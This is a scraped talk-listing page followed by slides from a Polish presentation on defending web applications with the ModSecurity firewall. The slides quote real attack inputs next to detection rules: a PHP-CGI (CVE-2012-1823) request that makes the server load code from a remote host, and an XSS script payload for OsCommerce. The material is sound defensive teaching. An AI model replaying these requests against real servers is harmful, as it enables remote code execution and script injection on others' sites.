NGSec 2016 - Ile warstw, tyle szans. - Leszek Miś@Defensive-Security.comLeszek Mi?
W dobie rozwijającego się w szybkim tempie rynku sprzedaży exploitów typu 0-day i wszechobecnych backdoorów w tzw. „drogich zabawkach”, coraz trudniejszym staje się utworzenie i utrzymanie bezpiecznej infrastruktury krytycznej. Aktualizacje oprogramowania jak i tzw. „old-schoolowe” triki utwardzające systemy i urządzenia sieciowe nadal uznawane są za poprawne, ale zdecydowanie nie są wystarczające. Potrzebujemy mechanizmów profilowania zachowania zarówno sieci, systemów jak i administratorów i użytkowników końcowych. Potrzebujemy więcej dedykowanych, „szytych na miarę” defensywnych konfiguracji oraz przede wszystkim izolacji na poszczególnych warstwach infrastruktury. Jednocześnie zdobywanie przez kadrę techniczną aktualnej, niepowiązanej z żadnym vendorem wiedzy z zakresu „offensive vs defensive” staje się kluczową kwestią w rozwoju technologicznym zespołów IT/ITSec.
Podczas prezentacji, na bazie wieloletniej obserwacji „podwórka IT Security” postaram się przedstawić możliwości, jakie drzemią w rozwiniętych rozwiązaniach Open Source dedykowanych utwardzaniu, profilowaniu i monitorowaniu systemów i sieci. Na bazie rzeczywistych przypadków omówione zostaną wybrane sposoby ochrony i wykrywania zdarzeń wykorzystując:
– izolację (Apparmor, SELinux, Docker/LXC, chroot/jail) celem utrudnienia eskalacji uprawnień
– filtrowanie i profilowanie (seccomp, systemtap, sysdig, GRR, Volatility, modsecurity/naxsi)
– aktywną i pasywną analizę ruchu sieciowego celem wczesnego wykrywania zagrożeń
– hardening jądra systemowego i przestrzeni użytkownika
– centralne miejsce składowania logów i korelacji zdarzeń (Elastic, Logstash, Kibana)
Prezentacja jest swego rodzaju drogowskazem do zbudowania własnej „fortecy” w sposób odmienny od tego, jaki prezentują liderzy komercyjnego rynku. Zastrzyk merytoryki gwarantowany!
Exatel Security Days 2017 - Niech dane pozostaną z Tobą! Sieciowe techniki ek...Leszek Mi?
Eksfiltracja danych to proces służący do "ukrytego" przesyłania danych pochodzących z przejętych lub zainfekowanych systemów i urządzeń sieciowych. Oprócz samej kradzieży danych celem atakującego jest przede wszystkim minimalizacja wykrycia takich działań. Podczas prelekcji omówione zostaną metody i techniki eksfiltracyjne bazujące na wykorzystaniu najpopularniejszych protokołów i usług sieciowych: DNS, ICMP, TCP, UDP, SSH, HTTP/HTTPS, a także w oparciu o popularne serwisy w chmurze, np. Google Docs, Slack czy Twitter. Krótkie wprowadzenie teoretyczne poparte zostanie licznymi, praktycznymi pokazami na żywo. Całość prezentacji ma na celu zwrócenie uwagi na jakże istotną wielopoziomową analizę ruchu sieciowego pod kątem anomalii, odejść od normy czy "egzotycznej" charakterystyki i pochodzenia będącej jednocześnie jednym z podstawowych elementów "Threat Huntingu" i procesu aktywnej ochrony.
Co z bezpieczeństwem aplikacji mobilnych? - studium przypadków (KrakWhiteHat ...Logicaltrust pl
Na podstawie ponad stu testów aplikacji mobilnych przedstawienie tego co robimy źle, a co jeszcze gorzej. Skupiając się głównie na platformach iOS oraz Android, przeanalizujemy garść typowych i nietypowych błędów. Przestudiujemy problemy, które można napotkać podczas testów bezpieczeństwa oraz pokażemy jak zaradny pentester może sobie z nimi poradzić, dobry programista unikać, a świadomy użytkownik zdawać sobie sprawę, że nosi dziurawy software w kieszeniach.
Pragmatic view on Electronic Signature directive 1999 93Pawel Krawczyk
Discussion of legal and technical issues with EU Directive 1999/93/EC that prevented it from being adopted by European market. See http://ipsec.pl/ for more details.
Are electronic signature assumptions realisticPawel Krawczyk
A retrospective analysis of basic legal and technical assumptions that were laid at base of EU Directive 1999/93/EC on electronic signatures and subsequent technical standards (CWA). See http://ipsec.pl/ for more details.
NGSec 2016 - Ile warstw, tyle szans. - Leszek Miś@Defensive-Security.comLeszek Mi?
W dobie rozwijającego się w szybkim tempie rynku sprzedaży exploitów typu 0-day i wszechobecnych backdoorów w tzw. „drogich zabawkach”, coraz trudniejszym staje się utworzenie i utrzymanie bezpiecznej infrastruktury krytycznej. Aktualizacje oprogramowania jak i tzw. „old-schoolowe” triki utwardzające systemy i urządzenia sieciowe nadal uznawane są za poprawne, ale zdecydowanie nie są wystarczające. Potrzebujemy mechanizmów profilowania zachowania zarówno sieci, systemów jak i administratorów i użytkowników końcowych. Potrzebujemy więcej dedykowanych, „szytych na miarę” defensywnych konfiguracji oraz przede wszystkim izolacji na poszczególnych warstwach infrastruktury. Jednocześnie zdobywanie przez kadrę techniczną aktualnej, niepowiązanej z żadnym vendorem wiedzy z zakresu „offensive vs defensive” staje się kluczową kwestią w rozwoju technologicznym zespołów IT/ITSec.
Podczas prezentacji, na bazie wieloletniej obserwacji „podwórka IT Security” postaram się przedstawić możliwości, jakie drzemią w rozwiniętych rozwiązaniach Open Source dedykowanych utwardzaniu, profilowaniu i monitorowaniu systemów i sieci. Na bazie rzeczywistych przypadków omówione zostaną wybrane sposoby ochrony i wykrywania zdarzeń wykorzystując:
– izolację (Apparmor, SELinux, Docker/LXC, chroot/jail) celem utrudnienia eskalacji uprawnień
– filtrowanie i profilowanie (seccomp, systemtap, sysdig, GRR, Volatility, modsecurity/naxsi)
– aktywną i pasywną analizę ruchu sieciowego celem wczesnego wykrywania zagrożeń
– hardening jądra systemowego i przestrzeni użytkownika
– centralne miejsce składowania logów i korelacji zdarzeń (Elastic, Logstash, Kibana)
Prezentacja jest swego rodzaju drogowskazem do zbudowania własnej „fortecy” w sposób odmienny od tego, jaki prezentują liderzy komercyjnego rynku. Zastrzyk merytoryki gwarantowany!
Exatel Security Days 2017 - Niech dane pozostaną z Tobą! Sieciowe techniki ek...Leszek Mi?
Eksfiltracja danych to proces służący do "ukrytego" przesyłania danych pochodzących z przejętych lub zainfekowanych systemów i urządzeń sieciowych. Oprócz samej kradzieży danych celem atakującego jest przede wszystkim minimalizacja wykrycia takich działań. Podczas prelekcji omówione zostaną metody i techniki eksfiltracyjne bazujące na wykorzystaniu najpopularniejszych protokołów i usług sieciowych: DNS, ICMP, TCP, UDP, SSH, HTTP/HTTPS, a także w oparciu o popularne serwisy w chmurze, np. Google Docs, Slack czy Twitter. Krótkie wprowadzenie teoretyczne poparte zostanie licznymi, praktycznymi pokazami na żywo. Całość prezentacji ma na celu zwrócenie uwagi na jakże istotną wielopoziomową analizę ruchu sieciowego pod kątem anomalii, odejść od normy czy "egzotycznej" charakterystyki i pochodzenia będącej jednocześnie jednym z podstawowych elementów "Threat Huntingu" i procesu aktywnej ochrony.
Co z bezpieczeństwem aplikacji mobilnych? - studium przypadków (KrakWhiteHat ...Logicaltrust pl
Na podstawie ponad stu testów aplikacji mobilnych przedstawienie tego co robimy źle, a co jeszcze gorzej. Skupiając się głównie na platformach iOS oraz Android, przeanalizujemy garść typowych i nietypowych błędów. Przestudiujemy problemy, które można napotkać podczas testów bezpieczeństwa oraz pokażemy jak zaradny pentester może sobie z nimi poradzić, dobry programista unikać, a świadomy użytkownik zdawać sobie sprawę, że nosi dziurawy software w kieszeniach.
Pragmatic view on Electronic Signature directive 1999 93Pawel Krawczyk
Discussion of legal and technical issues with EU Directive 1999/93/EC that prevented it from being adopted by European market. See http://ipsec.pl/ for more details.
Are electronic signature assumptions realisticPawel Krawczyk
A retrospective analysis of basic legal and technical assumptions that were laid at base of EU Directive 1999/93/EC on electronic signatures and subsequent technical standards (CWA). See http://ipsec.pl/ for more details.
Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"Pawel Krawczyk
This document discusses security vulnerabilities in the Apache Struts 2 framework and recommendations for mitigating them. It describes several vulnerabilities, including S2-006 (client-side code injection), S2-008 (remote command execution), and S2-009 (another RCE issue). For each, it provides details on how the vulnerability can be exploited as well as recommendations such as disabling dynamic method invocation, upgrading versions, and adding filters. It also discusses using Struts 2 responsibly by checking frameworks for vulnerabilities and reporting any issues found.
The document provides an audit questionnaire for assessing a vendor's quality management system and processes. It contains questions in several areas, including product identification and traceability, quality records, inspection and testing, statistical process control, quality system management, handling and storage, purchasing, design control, contract review, document control, handling non-conforming products, vendor quality control, and calibration. The questionnaire aims to evaluate key aspects of the vendor's quality system and identify any areas needing improvement.
Atmosphere 2014: Scalable and under control - open cloud architecture conside...PROIDEA
The central server farm, called reverse proxy shall be the internet exchange point of every extensive cloud infrastructure. However it seems that configuration of such critical systems in a correct and safe way is strongly complex. It is time-consuming and requires great experience and focus to setup the following aspects: proxy/load balancing/clustering, HTTPS, access control, event logging mechanisms, WAF or platform hardening. We cannot deny that every single detail of such configuration is crucial and meaningful. Moreover, maintenance and development of Web Gateway type scalable infrastructure, composed of dozen/few dozen nods, is a big challenge for us.
In this presentation, containing live demonstration, I will present you the concept of reverse proxy automated management, especially in terms of safety, with a use of Puppet open source supported platform and modsecurity as an open source Web Application Firewall. The main goal of my presentation is to show the idea of open, scalable cloud infrastructure, including general safety standards, as well as compliance with aspects described in the OWASP documents: Top Ten, Testing Guide, ASVS. And above all, I will show you how to eliminate those threats, before they are detected as a web application attack.
Leszek Miś - IT Security Architect at Linux Polska sp. z o.o. WALLF Web Gateway Project Leader. Linux/Network Security Expert with an offensive approach to web application security. For over 10 years professionally engaged and privately fascinated with open source solutions, with special focus on IT (in) security. Red Hat skilled trainer and examiner, holder of RHCA/RHCSS/RHCE. Experienced author of several IT Security courses (Hardening, SELinux, ModSecurity).
Czy naprawdę wiesz co robi twoja przeglądarka?OWASP
Prezentacja ze spotkania OWASP Poland, Warszawa 23.06.2016
Obecnie nie można sobie wyobrazić przeglądania Internetu z wyłączonymi skryptami, ale bezpieczeństwo zarówno samych aplikacji webowych, jak i stacji roboczej z przeglądarką pozostawia wiele do życzenia. W prezentacji przedstawione będą problemy związane z naruszeniem prywatności oraz potencjalne możliwości nadużyć spowodowanych przez sam fakt pobierania i przetwarzania obcych skryptów przez przeglądarkę. Omówione zostaną zarówno przyczyny, jak i obecnie dostępne metody zapobiegania zagrożeniom.
06 Bluetooth, zaprojektowany aby "zjednoczyć"MarcinStachniuk
Prezentacja wprowadzająca do korzystania z Bluetooth'a w j2me. Przygotowana i wygłoszona przez Przemysława Bieruta 03.12.2009.
Prezentacja wygłoszona w ramach Warsztatów programowania telefonów komórkowych w j2me przy Studenckim Kole Naukowym Informatyki Systemów Autonomicznych i Adaptacyjnych ISA^2.
Ochrona przed atakami DDoS na platformie x86. Czy można mieć jednocześnie wyd...Redge Technologies
(Polish only)
Gaming/DDoS mitigation/x86 performance and elasticity.
Talk given at Net::IP meetup in Wrocław, Poland (2017.05): https://www.meetup.com/Wroclaw-Net-IP-Meetup/events/238738376/
Wybierz i poznaj system Slackware Linux!
* Jak zarządzać systemem Slackware Linux?
* Jak właściwie zabezpieczyć serwer przed atakami z sieci?
* Jak optymalnie skonfigurować połączenia sieciowe?
Slackware jest najstarszą, lecz na bieżąco rozwijaną dystrybucją Linuksa. Każdy element tego systemu zaprojektowany został w sposób możliwie najprostszy w programowaniu i realizacji. Dzięki temu uzyskano wysoką wydajność, stabilność i bezpieczeństwo. Chociaż konfigurowanie Slackware jest trudniejsze niż w przypadku innych dystrybucji, warto zainwestować w naukę, ponieważ łatwiej jest „wgryźć się” w ten system, poznać jego wnętrze, a potem także stworzyć własne narzędzia upraszczające konfigurację. Ze względu na te cechy Slackware jest szczególnie polecany do pracy na serwerach sieciowych.
Książka „Slackware Linux. Ćwiczenia” w formie praktycznych ćwiczeń pokazuje sposób realizacji podstawowych zadań administracyjnych i systemowych. Dzięki temu podręcznikowi nauczysz się od podstaw instalować system i zarządzać plikami oraz zdalnie administrować serwerem z poziomu dowolnego innego komputera, podłączonego do tej samej sieci lokalnej lub internetu. Dowiesz się, na czym polega przetwarzanie potokowe, a także konfiguracja i diagnostyka sieci. Będziesz wiedział, jak monitorować ruch w sieci lokalnej i zabezpieczyć ją przed atakami z zewnątrz.
* Instalacja systemu
* Zarządzanie plikami
* Przetwarzanie potokowe
* Zwielokrotnianie operacji na plikach
* Tekstowe i graficzne środowisko pracy
* Konfiguracja i diagnostyka sieci
* Zabezpieczenia
* Monitorowanie ruchu w sieci lokalnej
* Serwer internetowy i serwis WWW
Zostań administratorem — stwórz własną sieć i sprawnie nią zarządzaj!
Sześć sposobów na przejęcie sieci przemysłowej w twojej firmieSecuRing
Agenda:
1. Wstęp - kto i po co chciałby zaatakować naszą infrastrukturę
2. Przykłady w jaki sposób mógłby wyglądać atak – omówienie na konkretnych sytuacjach:
atak „z Internetu”
przejęcie stacji w LAN
przejęcie telefonu
atak lokalny na transmisje bezprzewodowe
atak lokalny na okablowanie, niezabezpieczone gniazdka, switche...
ataki na transmisję przez Internet - słabości VPN, łącza GSM, ...
3. Czy skuteczna separacja sieci przemysłowej jest możliwa? Czy zawsze jest zgodna z założeniami? Jak zidentyfikować nieoczywiste punkty styku i ocenić ich bezpieczeństwo?
4. Porady i wskazówki, jak minimalizować zagrożenie
Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"Pawel Krawczyk
This document discusses security vulnerabilities in the Apache Struts 2 framework and recommendations for mitigating them. It describes several vulnerabilities, including S2-006 (client-side code injection), S2-008 (remote command execution), and S2-009 (another RCE issue). For each, it provides details on how the vulnerability can be exploited as well as recommendations such as disabling dynamic method invocation, upgrading versions, and adding filters. It also discusses using Struts 2 responsibly by checking frameworks for vulnerabilities and reporting any issues found.
The document provides an audit questionnaire for assessing a vendor's quality management system and processes. It contains questions in several areas, including product identification and traceability, quality records, inspection and testing, statistical process control, quality system management, handling and storage, purchasing, design control, contract review, document control, handling non-conforming products, vendor quality control, and calibration. The questionnaire aims to evaluate key aspects of the vendor's quality system and identify any areas needing improvement.
Atmosphere 2014: Scalable and under control - open cloud architecture conside...PROIDEA
The central server farm, called reverse proxy shall be the internet exchange point of every extensive cloud infrastructure. However it seems that configuration of such critical systems in a correct and safe way is strongly complex. It is time-consuming and requires great experience and focus to setup the following aspects: proxy/load balancing/clustering, HTTPS, access control, event logging mechanisms, WAF or platform hardening. We cannot deny that every single detail of such configuration is crucial and meaningful. Moreover, maintenance and development of Web Gateway type scalable infrastructure, composed of dozen/few dozen nods, is a big challenge for us.
In this presentation, containing live demonstration, I will present you the concept of reverse proxy automated management, especially in terms of safety, with a use of Puppet open source supported platform and modsecurity as an open source Web Application Firewall. The main goal of my presentation is to show the idea of open, scalable cloud infrastructure, including general safety standards, as well as compliance with aspects described in the OWASP documents: Top Ten, Testing Guide, ASVS. And above all, I will show you how to eliminate those threats, before they are detected as a web application attack.
Leszek Miś - IT Security Architect at Linux Polska sp. z o.o. WALLF Web Gateway Project Leader. Linux/Network Security Expert with an offensive approach to web application security. For over 10 years professionally engaged and privately fascinated with open source solutions, with special focus on IT (in) security. Red Hat skilled trainer and examiner, holder of RHCA/RHCSS/RHCE. Experienced author of several IT Security courses (Hardening, SELinux, ModSecurity).
Czy naprawdę wiesz co robi twoja przeglądarka?OWASP
Prezentacja ze spotkania OWASP Poland, Warszawa 23.06.2016
Obecnie nie można sobie wyobrazić przeglądania Internetu z wyłączonymi skryptami, ale bezpieczeństwo zarówno samych aplikacji webowych, jak i stacji roboczej z przeglądarką pozostawia wiele do życzenia. W prezentacji przedstawione będą problemy związane z naruszeniem prywatności oraz potencjalne możliwości nadużyć spowodowanych przez sam fakt pobierania i przetwarzania obcych skryptów przez przeglądarkę. Omówione zostaną zarówno przyczyny, jak i obecnie dostępne metody zapobiegania zagrożeniom.
06 Bluetooth, zaprojektowany aby "zjednoczyć"MarcinStachniuk
Prezentacja wprowadzająca do korzystania z Bluetooth'a w j2me. Przygotowana i wygłoszona przez Przemysława Bieruta 03.12.2009.
Prezentacja wygłoszona w ramach Warsztatów programowania telefonów komórkowych w j2me przy Studenckim Kole Naukowym Informatyki Systemów Autonomicznych i Adaptacyjnych ISA^2.
Ochrona przed atakami DDoS na platformie x86. Czy można mieć jednocześnie wyd...Redge Technologies
(Polish only)
Gaming/DDoS mitigation/x86 performance and elasticity.
Talk given at Net::IP meetup in Wrocław, Poland (2017.05): https://www.meetup.com/Wroclaw-Net-IP-Meetup/events/238738376/
Wybierz i poznaj system Slackware Linux!
* Jak zarządzać systemem Slackware Linux?
* Jak właściwie zabezpieczyć serwer przed atakami z sieci?
* Jak optymalnie skonfigurować połączenia sieciowe?
Slackware jest najstarszą, lecz na bieżąco rozwijaną dystrybucją Linuksa. Każdy element tego systemu zaprojektowany został w sposób możliwie najprostszy w programowaniu i realizacji. Dzięki temu uzyskano wysoką wydajność, stabilność i bezpieczeństwo. Chociaż konfigurowanie Slackware jest trudniejsze niż w przypadku innych dystrybucji, warto zainwestować w naukę, ponieważ łatwiej jest „wgryźć się” w ten system, poznać jego wnętrze, a potem także stworzyć własne narzędzia upraszczające konfigurację. Ze względu na te cechy Slackware jest szczególnie polecany do pracy na serwerach sieciowych.
Książka „Slackware Linux. Ćwiczenia” w formie praktycznych ćwiczeń pokazuje sposób realizacji podstawowych zadań administracyjnych i systemowych. Dzięki temu podręcznikowi nauczysz się od podstaw instalować system i zarządzać plikami oraz zdalnie administrować serwerem z poziomu dowolnego innego komputera, podłączonego do tej samej sieci lokalnej lub internetu. Dowiesz się, na czym polega przetwarzanie potokowe, a także konfiguracja i diagnostyka sieci. Będziesz wiedział, jak monitorować ruch w sieci lokalnej i zabezpieczyć ją przed atakami z zewnątrz.
* Instalacja systemu
* Zarządzanie plikami
* Przetwarzanie potokowe
* Zwielokrotnianie operacji na plikach
* Tekstowe i graficzne środowisko pracy
* Konfiguracja i diagnostyka sieci
* Zabezpieczenia
* Monitorowanie ruchu w sieci lokalnej
* Serwer internetowy i serwis WWW
Zostań administratorem — stwórz własną sieć i sprawnie nią zarządzaj!
Sześć sposobów na przejęcie sieci przemysłowej w twojej firmieSecuRing
Agenda:
1. Wstęp - kto i po co chciałby zaatakować naszą infrastrukturę
2. Przykłady w jaki sposób mógłby wyglądać atak – omówienie na konkretnych sytuacjach:
atak „z Internetu”
przejęcie stacji w LAN
przejęcie telefonu
atak lokalny na transmisje bezprzewodowe
atak lokalny na okablowanie, niezabezpieczone gniazdka, switche...
ataki na transmisję przez Internet - słabości VPN, łącza GSM, ...
3. Czy skuteczna separacja sieci przemysłowej jest możliwa? Czy zawsze jest zgodna z założeniami? Jak zidentyfikować nieoczywiste punkty styku i ocenić ich bezpieczeństwo?
4. Porady i wskazówki, jak minimalizować zagrożenie
PLNOG 13: Andrzej Karpiński: Mechanizmy ochrony anty-DDoS stosowanych w Tele...PROIDEA
Andrzej Karpiński – TBD
Temat prezentacji: Mechanizmy ochrony anty-DDoS stosowanych w Telekomunikacji Polskiej / Orange.
Język prezentacji: Polski
Abstrakt: Orange posiada największą ilość abonentów w Polsce, i w związku z tym największą infrastrukturę sieciową w kraju. Sieć Orange, podobnie jak sieci innych operatorów, jest obiektem ataków DDoS. W naszej prezentacji chcielibyśmy omówić problematykę związaną z atakami DDoS w skali takiego operatora w praktyce, oraz opowiedzieć o tym, jak próbujemy sobie z tym na co dzień radzić. Prezentacja byłaby podzielona na dwie części – w pierwszej zaprezentowalibyśmy przykładowe ataki i ich wpływ na usługi i klientów, z rozbiciem na kategorie: usługi mobilne, usługi szerokopasmowe kablowe i segment klientów premium (biznes, łącza międzyoperatorskie). Parę słów trzebaby także powiedzieć na temat wpływu ataków na samą infrastrukturę sieci (przeciążenia routerów, firewalli, łączy wewnątrz sieci Orange). W drugiej części pokazalibyśmy co operator może z tego typu atakami robić dziś, i jakie są pomysły i oczekiwania w zakresie przyszłości. Prezentacja nie będzie pokazywała żadnego konkretnie komercyjnego produktu sprzedawanego przez Orange, będą to raczej ogólnosieciowo-rynkowe rozważania na temat metod podejścia do takich problemów. Myślę, że ciekawe i ogólnorozwojowe dla dość szerokiego grona słuchaczy.
Docker, Jenkins, network topology, system configuration and software delivery management - all of these are the bread and butter of each DevOps team, but can be also a recipe for a disaster. Walk through the most devastating security failures in DevOps environments I've seen in real life, including network architecture, security controls design and implementation.
The document summarizes the transformation of the internet from a decentralized network of individual websites and blogs to a centralized platform optimized for profit through targeted advertising. It discusses how user privacy has been compromised as centralized platforms aggregate user data and sell access to user profiles in real-time bidding. The document provides recommendations for protecting privacy, including using privacy-focused browsers and apps, blocking trackers and ads, and exploring alternatives to centralized social networks like Secure Scuttlebutt that focus on decentralized protocols.
- Modern web application frameworks have powerful security features built-in like template escaping, database abstraction, session management, and authentication that help prevent vulnerabilities like XSS and SQL injection. These features are standard, well-tested, and usually more robust than custom code.
- Libraries and dependencies make up a large portion of modern applications. It is important to keep dependencies up-to-date with security patches and be careful about dependencies from untrusted sources like some examples on StackOverflow.
- Different security scanners like SAST, DAST, and IAST scan applications in different ways and at different stages, but an important factor is how well they understand the specific programming languages, frameworks, and technologies used in the application being
This document discusses input validation of free-form Unicode text in web applications. It begins with an introduction to Unicode and some of the challenges with representing different languages and characters. It then discusses strategies for validating Unicode text, such as enforcing Unicode character categories, scripts, text direction and normalization. The document emphasizes thinking of text as composed of characters rather than bytes and having clear policies around what constitutes valid text for an application's user base.
Get rid of TLS certificates - using IPSec for large scale cloud protectionPawel Krawczyk
This document summarizes transport layer security (TLS) and internet protocol security (IPSec) options for securing communications in Linux. It describes various user-mode and kernel-mode TLS and IPSec implementations like SSH, OpenVPN, WireGuard etc. The document then focuses on IPSec, explaining its architecture, configuration using setkey and racoon, and troubleshooting IPSec issues. It concludes by introducing an Ansible role for automating and simplifying IPSec configuration.
This is a security awareness presentation on impact of developing and using insecure applications in organisations. Number of case studies of data leaks, defacements and regulatory fines are presented as example.
The document discusses real-world information security challenges and lessons learned from various organizations. It emphasizes performing risk analysis and balancing security controls with business needs. Key points include avoiding a "one-size-fits-all" approach, controlling costs, learning from past incidents, and ensuring security controls help rather than hinder business processes.
1. Czy Twój WAF to potrafi?
modsecurity.
Leszek Miś
IT Security Architect
RHCA, RHCSS
lm@linuxpolska.pl
1
Copyright 2011 Linux Polska Sp. z o.o. Al. Jerozolimskie 123A 02-017 Warszawa www.linuxpolska.pl biuro@linuxpolska.pl
2. /whoami
• IT Security Architect @ Linux Polska Sp. z o.o.
• Lider projektu WALLF Web Gateway (http://wallf.pl)
• RHCA/RHCSS/RHCX
• Skupiam się głównie na:
– Linux Security
– Web Security
– Pentesty
– SSO
– Linux forensics
– Klastry, wirtualizacja, cloud, storage
2
Copyright 2011 Linux Polska Sp. z o.o. Al. Jerozolimskie 123A 02-017 Warszawa www.linuxpolska.pl biuro@linuxpolska.pl
3. Agenda
1. Kilka słów wstępu.
2. Podstawowe możliwości.
3. Realne przypadki
4. PoC:
- Honeypot + modsecurity
- BeeF+modsecurity = give me your real IP!
5. Podsumowanie.
3
Copyright 2011 Linux Polska Sp. z o.o. Al. Jerozolimskie 123A 02-017 Warszawa www.linuxpolska.pl biuro@linuxpolska.pl
4. modsecurity
• Najczęściej wykorzystywany WAF na świecie
• Open source
• Tysiące dl/miesiąc
• Chronionych ponad milion serwerów
• Tryby pracy:
– Wbudowany
– Reverse Proxy
4
Copyright 2011 Linux Polska Sp. z o.o. Al. Jerozolimskie 123A 02-017 Warszawa www.linuxpolska.pl biuro@linuxpolska.pl
5. modsecurity
• Od zawsze dostępny dla Apache
• Od niedawna także dla:
– Nginx (jest też naxsi oraz ngx_LUA based)
– Microsoft IIS
• Blacklist: OWASP Modsecurity Core Rule Set
• Whitelist – learning mode:
– Modprofiler
– WebApplicationProfiler
– REMO
5
Copyright 2011 Linux Polska Sp. z o.o. Al. Jerozolimskie 123A 02-017 Warszawa www.linuxpolska.pl biuro@linuxpolska.pl
6. modsecurity
6
Copyright 2011 Linux Polska Sp. z o.o. Al. Jerozolimskie 123A 02-017 Warszawa www.linuxpolska.pl biuro@linuxpolska.pl
7. modsecurity
• Wirtualne patchowanie i integracja z DAST:
– ZAP, Arachni, RPC LUA API
• Bramka typu Intrusion Prevention dla protokołu HTTP
(Reverse Proxy)
• Możliwość szybkiej modyfikacji reguł
• Ochrona przed błędami typu 0-day dla aplikacji
webowych
• Geolokalizacja
• Ochrona antywirusowa dla uploadów
• Nadawanie flag ciasteczkom
7
Copyright 2011 Linux Polska Sp. z o.o. Al. Jerozolimskie 123A 02-017 Warszawa www.linuxpolska.pl biuro@linuxpolska.pl
8. Modsecurity CRS
• HTTP Protection - detecting violations of the HTTP protocol
and a locally defined usage policy.
• Real-time Blacklist Lookups - utilizes 3rd Party IP Reputation
• Web-based Malware Detection - identifies malicious web
content by check against the Google Safe Browsing API.
• HTTP Denial of Service Protections - defense against HTTP
Flooding and Slow HTTP DoS Attacks.
• Common Web Attacks Protection - detecting common web
application security attack.
• Automation Detection - Detecting bots, crawlers, scanners and
other surface malicious activity.
8
Copyright 2011 Linux Polska Sp. z o.o. Al. Jerozolimskie 123A 02-017 Warszawa www.linuxpolska.pl biuro@linuxpolska.pl
9. Modsecurity CRS
• Integration with AV Scanning for File Uploads - detects
malicious files uploaded through the web application.
• Tracking Sensitive Data - Tracks Credit Card usage and blocks
leakages.
• Trojan Protection - Detecting access to Trojans horses.
• Identification of Application Defects - alerts on application
misconfigurations.
• Error Detection and Hiding - Disguising error messages sent by
the server.
9
Copyright 2011 Linux Polska Sp. z o.o. Al. Jerozolimskie 123A 02-017 Warszawa www.linuxpolska.pl biuro@linuxpolska.pl
10. Modsecurity CRS
modsecurity_35_bad_robots.data modsecurity_crs_23_request_limits.conf
modsecurity_crs_47_common_exceptions.conf modsecurity_35_scanners.data
modsecurity_crs_30_http_policy.conf
modsecurity_crs_48_local_exceptions.conf.example
modsecurity_40_generic_attacks.data modsecurity_crs_35_bad_robots.conf
modsecurity_crs_49_inbound_blocking.conf
modsecurity_41_sql_injection_attacks.data
modsecurity_crs_40_generic_attacks.conf modsecurity_crs_50_outbound.conf
modsecurity_50_outbound.data
modsecurity_crs_41_sql_injection_attacks.conf
modsecurity_crs_59_outbound_blocking.conf
modsecurity_50_outbound_malware.data
modsecurity_crs_41_xss_attacks.conf
modsecurity_crs_60_correlation.conf modsecurity_crs_20_protocol_violations.conf
modsecurity_crs_42_tight_security.conf
modsecurity_crs_21_protocol_anomalies.conf modsecurity_crs_45_trojans.conf
10
Copyright 2011 Linux Polska Sp. z o.o. Al. Jerozolimskie 123A 02-017 Warszawa www.linuxpolska.pl biuro@linuxpolska.pl
11. Realne przypadki
11
Copyright 2011 Linux Polska Sp. z o.o. Al. Jerozolimskie 123A 02-017 Warszawa www.linuxpolska.pl biuro@linuxpolska.pl
12. Realne przypadki
• Ruby on Rails XML Exploits
– Podatność w kodzie parsującym parametry XML –
YAML i Symbol
– Wykonanie dowolnego polecenia systemowego
• Modsecurity potrafi parsować i walidować XML:
• SecRule REQUEST_HEADERS:Content-Type "text/xml"
"id:'900017', phase:1, t:none,t:lowercase,
nolog, pass, chain"
SecRule REQBODY_PROCESSOR "!@streq XML"
"ctl:requestBodyProcessor=XML"
12
Copyright 2011 Linux Polska Sp. z o.o. Al. Jerozolimskie 123A 02-017 Warszawa www.linuxpolska.pl biuro@linuxpolska.pl
13. Realne przypadki
• Positive security model dla formularza logowania +
ochrona przed brute force
•
13
Copyright 2011 Linux Polska Sp. z o.o. Al. Jerozolimskie 123A 02-017 Warszawa www.linuxpolska.pl biuro@linuxpolska.pl
14. Realne przypadki
• Ochrona przed atakami typu Slow HTTP DOS
– Slowloris:
• Atakujący wysyła niekompletny zbiór nagłówków
• „Zaśmiecenie” kolejki read request i write request
• Serwer oczekuje dalszych requestów, aż do Timeoutu
• Wysyłanie kolejnych żądań powoduje wysycenie
zasobów
– R-U-dead-yet czyli RUDY attack:
• Faza request headers wykonywana poprawnie
• Wolne wysyłanie request body, np 1bajt/100s
– Wiele innych jak HOIC/LOIC
14
Copyright 2011 Linux Polska Sp. z o.o. Al. Jerozolimskie 123A 02-017 Warszawa www.linuxpolska.pl biuro@linuxpolska.pl
15. Realne przypadki
• Kontrolowanie ilości połączeń w stanie Busy:
SecReadStateLimit 5
SecWriteStateLimit 5
• [Mon Nov 22 17:44:46 2010] [warn] ModSecurity: Access denied with code 400.
• Too many connections [6] of 5 allowed in READ state from 8X.XX.XX.XX -
• Possible DoS Consumption Attack [Rejected]
• [Mon Nov 22 17:44:47 2010] [warn] ModSecurity: Access denied with code 400.
• Too many connections [6] of 5 allowed in READ state from 8X.XX.XX.XX -
• Possible DoS Consumption Attack [Rejected]
15
Copyright 2011 Linux Polska Sp. z o.o. Al. Jerozolimskie 123A 02-017 Warszawa www.linuxpolska.pl biuro@linuxpolska.pl
16. Realne przypadki
• HULK DOS Tool:
– Pythony skrypt
– Randomizowane wartości nagłówków: User-Agent,
Referer, Keep-alive
– Zawsze ta sama kolejność
–
•
16
Copyright 2011 Linux Polska Sp. z o.o. Al. Jerozolimskie 123A 02-017 Warszawa www.linuxpolska.pl biuro@linuxpolska.pl
17. Realne przypadki
• CVE-2012-1823:
– PHP jako czyste CGI
– mod_cgid
• Możliwość podglądu kodu źródłowego:
– 'GET /index.php?-s'
– /index.php?-dallow_url_include%3don+-
dauto_prepend_file
%3dhttp://www.bu67778.com/a.txt'
• SecRule QUERY_STRING "^-[sdcr]"
"phase:1,t:none,t:urlDecodeUni,t:removeWhitespace,block
,log,msg:'Potential PHP-CGI Exploit Attempt'"
• Copyright 2011 Linux Polska Sp. z o.o. Al. Jerozolimskie 123A 02-017 Warszawa www.linuxpolska.pl biuro@linuxpolska.pl
17
18. Realne przypadki
• OsCommerce 3.0.2 – XSS
• Parametr „name” :
– POST /oscommerce/index.php?
RPC&Setup&Install&DBCheck HTTP/1.1
– server=&username=&password=&name=
%3Cscript%3Ealert(123)%3C%2Fscript
%3E&port=&class=SQL
•
18
Copyright 2011 Linux Polska Sp. z o.o. Al. Jerozolimskie 123A 02-017 Warszawa www.linuxpolska.pl biuro@linuxpolska.pl
19. Realne przypadki
• Movable Types: XSS
• Parametr dbuser:
